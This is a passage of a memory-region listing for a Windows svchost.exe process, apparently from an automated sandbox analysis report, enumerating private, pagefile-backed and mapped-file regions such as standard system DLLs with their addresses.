entry_point = 0xca0000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 739 start_va = 0xcc0000 end_va = 0xcc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 740 start_va = 0xcd0000 end_va = 0xcd0fff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 741 start_va = 0xce0000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 742 start_va = 0xd60000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 743 start_va = 0xde0000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 744 start_va = 0xe60000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 745 start_va = 0xef0000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 746 start_va = 0xf80000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 747 start_va = 0x1000000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 748 start_va = 0x1080000 end_va = 0x134efff entry_point = 0x1080000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 749 start_va = 0x1360000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 750 start_va = 0x13f0000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 751 start_va = 0x1480000 end_va = 0x148ffff entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 752 start_va = 0x14a0000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 753 start_va = 0x1540000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 754 start_va = 0x15f0000 end_va = 0x166ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 755 start_va = 0x1680000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 756 start_va = 0x1750000 end_va = 0x17cffff entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 757 start_va = 0x1800000 end_va = 0x187ffff entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 758 start_va = 0x18b0000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x00000000018b0000" filename = "" Region: id = 759 start_va = 0x1980000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 760 start_va = 0x1a20000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 761 start_va = 0x1aa0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 762 start_va = 0x1ba0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 763 start_va = 0x1c30000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 764 start_va = 0x1cb0000 end_va = 0x1d15fff entry_point = 0x1cb0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 765 start_va = 0x1d80000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 766 start_va = 0x1e70000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 767 start_va = 0x1e80000 end_va = 0x21c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 768 start_va = 0x21d0000 end_va = 0x22cffff entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 769 start_va = 0x22d0000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 770 start_va = 0x2380000 end_va = 0x23fffff entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 771 start_va = 0x2400000 end_va = 0x247ffff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 772 start_va = 0x24a0000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 773 start_va = 0x2550000 end_va = 0x255ffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 774 start_va = 0x25a0000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 775 start_va = 0x2620000 end_va = 0x271ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 776 start_va = 0x2720000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 777 start_va = 0x2830000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 778 start_va = 0x2910000 end_va = 0x298ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 779 start_va = 0x29f0000 end_va = 0x2a6ffff entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 780 start_va = 0x2b20000 end_va = 0x2b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 781 start_va = 0x2bb0000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 782 start_va = 0x2be0000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002be0000" filename = "" Region: id = 783 start_va = 0x2c60000 end_va = 0x2d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 784 start_va = 0x2d60000 end_va = 0x2ddffff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 785 start_va = 0x2e60000 end_va = 0x2f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 786 start_va = 0x2fe0000 end_va = 0x305ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 787 start_va = 0x3140000 end_va = 0x31bffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 788 start_va = 0x31c0000 end_va = 0x323ffff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 789 start_va = 0x3260000 end_va = 0x32dffff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 790 start_va = 0x3360000 end_va = 0x345ffff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 791 start_va = 0x34a0000 end_va = 0x351ffff entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 792 start_va = 0x3540000 end_va = 0x35bffff entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 793 start_va = 0x35d0000 end_va = 0x364ffff entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 794 start_va = 0x36b0000 end_va = 0x372ffff entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 795 start_va = 0x3750000 end_va = 0x37cffff entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 796 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 797 start_va = 0x38c0000 end_va = 0x393ffff entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 798 start_va = 0x3940000 end_va = 0x3b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003940000" filename = "" Region: id = 799 start_va = 0x3b90000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b90000" filename = "" Region: id = 800 start_va = 0x3ca0000 end_va = 0x3d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 801 start_va = 0x3d80000 end_va = 0x3dfffff entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 802 start_va = 0x3e60000 end_va = 0x3edffff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 803 start_va = 0x3f60000 end_va = 0x3fdffff entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 804 start_va = 0x4070000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 805 start_va = 0x40f0000 end_va = 0x416ffff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 806 start_va = 0x41e0000 end_va = 0x425ffff entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 807 start_va = 0x42d0000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 808 start_va = 0x4350000 end_va = 0x444ffff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 809 start_va = 0x44c0000 end_va = 0x453ffff entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 810 start_va = 0x4540000 end_va = 0x45bffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 811 start_va = 0x45c0000 end_va = 0x47bffff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 812 start_va = 0x4830000 end_va = 0x48affff entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 813 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 814 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 815 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 816 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 817 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 818 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 819 start_va = 0xffaa0000 end_va = 0xffaaafff entry_point = 0xffaa0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 820 start_va = 0x7fef5270000 end_va = 0x7fef527bfff entry_point = 0x7fef5270000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 821 start_va = 0x7fef53d0000 end_va = 0x7fef53d7fff entry_point = 0x7fef53d0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 822 start_va = 0x7fef53e0000 end_va = 0x7fef5421fff entry_point = 0x7fef53e0000 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 823 start_va = 0x7fef5430000 end_va = 0x7fef5469fff entry_point = 0x7fef5430000 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 824 start_va = 0x7fef5470000 end_va = 0x7fef5489fff entry_point = 0x7fef5470000 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 825 start_va = 0x7fef5490000 end_va = 0x7fef549efff entry_point = 0x7fef5490000 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 826 start_va = 0x7fef54a0000 end_va = 0x7fef550afff entry_point = 0x7fef54a0000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 827 start_va = 0x7fef5510000 end_va = 0x7fef5528fff entry_point = 0x7fef5510000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 828 start_va = 0x7fef5530000 end_va = 0x7fef557ffff entry_point = 0x7fef5530000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 829 start_va = 0x7fef55b0000 end_va = 0x7fef562dfff entry_point = 0x7fef55b0000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 830 start_va = 0x7fef5630000 end_va = 0x7fef5645fff entry_point = 0x7fef5630000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 831 start_va = 0x7fef5650000 end_va = 0x7fef570bfff entry_point = 0x7fef5650000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 832 start_va = 0x7fef5710000 end_va = 0x7fef5782fff entry_point = 0x7fef5710000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 833 start_va = 0x7fef5790000 end_va = 0x7fef57b5fff entry_point = 0x7fef5790000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 834 start_va = 0x7fef57c0000 end_va = 0x7fef57d9fff entry_point = 0x7fef57c0000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 835 start_va = 0x7fef57e0000 end_va = 0x7fef5863fff entry_point = 0x7fef57e0000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 836 start_va = 0x7fef5870000 end_va = 0x7fef5894fff entry_point = 0x7fef5870000 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 837 start_va = 0x7fef58a0000 end_va = 0x7fef59cefff entry_point = 0x7fef58a0000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 838 start_va = 0x7fef59d0000 end_va = 0x7fef5a16fff entry_point = 0x7fef59d0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 839 start_va = 0x7fef5a20000 end_va = 0x7fef5a61fff entry_point = 0x7fef5a20000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 840 start_va = 0x7fef5a70000 end_va = 0x7fef5b01fff entry_point = 0x7fef5a70000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 841 start_va = 0x7fef5e10000 end_va = 0x7fef5e95fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 842 start_va = 0x7fef5ea0000 end_va = 0x7fef5edffff entry_point = 0x7fef5ea0000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 843 start_va = 0x7fef60c0000 end_va = 0x7fef60c8fff entry_point = 0x7fef60c0000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 844 start_va = 0x7fef65d0000 end_va = 0x7fef65e6fff entry_point = 0x7fef65d0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 845 start_va = 0x7fef65f0000 end_va = 0x7fef679ffff entry_point = 0x7fef65f0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 846 start_va = 0x7fef67d0000 end_va = 0x7fef6843fff entry_point = 0x7fef67d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 847 start_va = 0x7fef8830000 end_va = 0x7fef891dfff entry_point = 0x7fef8830000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 848 start_va = 0x7fef8df0000 end_va = 0x7fef8e66fff entry_point = 0x7fef8df0000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 849 start_va = 0x7fefa810000 end_va = 0x7fefa819fff entry_point = 0x7fefa810000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 850 start_va = 0x7fefa820000 end_va = 0x7fefa931fff entry_point = 0x7fefa820000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 851 start_va = 0x7fefac60000 end_va = 0x7fefac6efff entry_point = 0x7fefac60000 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 852 start_va = 0x7fefac70000 end_va = 0x7fefac78fff entry_point = 0x7fefac70000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 853 start_va = 0x7fefac80000 end_va = 0x7fefac88fff entry_point = 0x7fefac80000 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 854 start_va = 0x7fefac90000 end_va = 0x7feface5fff entry_point = 0x7fefac90000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 855 start_va = 0x7fefacf0000 end_va = 0x7fefad4dfff entry_point = 0x7fefacf0000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 856 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 857 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 858 start_va = 0x7fefae50000 end_va = 0x7fefae65fff entry_point = 0x7fefae50000 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 859 start_va = 0x7fefae80000 end_va = 0x7fefaed2fff entry_point = 0x7fefae80000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 860 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 861 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 862 start_va = 0x7fefb030000 end_va = 0x7fefb043fff entry_point = 0x7fefb030000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 863 start_va = 0x7fefb060000 end_va = 0x7fefb0c6fff entry_point = 0x7fefb060000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 864 start_va = 0x7fefb0d0000 end_va = 0x7fefb0dafff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 865 start_va = 0x7fefb0e0000 end_va = 0x7fefb0ebfff entry_point = 0x7fefb0e0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 866 start_va = 0x7fefb0f0000 end_va = 0x7fefb0fffff entry_point = 0x7fefb0f0000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 867 start_va = 0x7fefb100000 end_va = 0x7fefb118fff entry_point = 0x7fefb100000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 868 start_va = 0x7fefb120000 end_va = 0x7fefb156fff entry_point = 0x7fefb120000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 869 start_va = 0x7fefb1a0000 end_va = 0x7fefb1b4fff entry_point = 0x7fefb1a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 870 start_va = 0x7fefb1c0000 end_va = 0x7fefb281fff entry_point = 0x7fefb1c0000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 871 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 872 start_va = 0x7fefb5b0000 end_va = 0x7fefb5c0fff entry_point = 0x7fefb5b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 873 start_va = 0x7fefb5d0000 end_va = 0x7fefb60cfff entry_point = 0x7fefb5d0000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 874 start_va = 0x7fefb610000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb610000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 875 start_va = 0x7fefb700000 end_va = 0x7fefb713fff entry_point = 0x7fefb700000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 876 start_va = 0x7fefb720000 end_va = 0x7fefb734fff entry_point = 0x7fefb720000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 877 start_va = 0x7fefb740000 end_va = 0x7fefb74bfff entry_point = 0x7fefb740000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 878 start_va = 0x7fefb750000 end_va = 0x7fefb765fff entry_point = 0x7fefb750000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 879 start_va = 0x7fefb770000 end_va = 0x7fefb777fff entry_point = 0x7fefb770000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 880 start_va = 0x7fefb780000 end_va = 0x7fefb793fff entry_point = 0x7fefb780000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 881 start_va = 0x7fefb7a0000 end_va = 0x7fefb80efff entry_point = 0x7fefb7a0000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 882 start_va = 0x7fefb810000 end_va = 0x7fefb836fff entry_point = 0x7fefb810000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 883 start_va = 0x7fefb880000 end_va = 0x7fefb890fff entry_point = 0x7fefb880000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 884 start_va = 0x7fefb8a0000 end_va = 0x7fefb8aefff entry_point = 0x7fefb8a0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 885 start_va = 0x7fefb9e0000 end_va = 0x7fefba14fff entry_point = 0x7fefb9e0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 886 start_va = 0x7fefbe50000 end_va = 0x7fefbea5fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 887 start_va = 0x7fefbeb0000 end_va = 0x7fefbfdbfff entry_point = 0x7fefbeb0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 888 start_va = 0x7fefbfe0000 end_va = 0x7fefbffcfff entry_point = 0x7fefbfe0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 889 start_va = 0x7fefc030000 end_va = 0x7fefc223fff entry_point = 0x7fefc030000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 890 start_va = 0x7fefc520000 end_va = 0x7fefc53cfff entry_point = 0x7fefc520000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 891 start_va = 0x7fefc540000 end_va = 0x7fefc548fff entry_point = 0x7fefc540000 region_type = mapped_file name = "avrt.dll" filename = 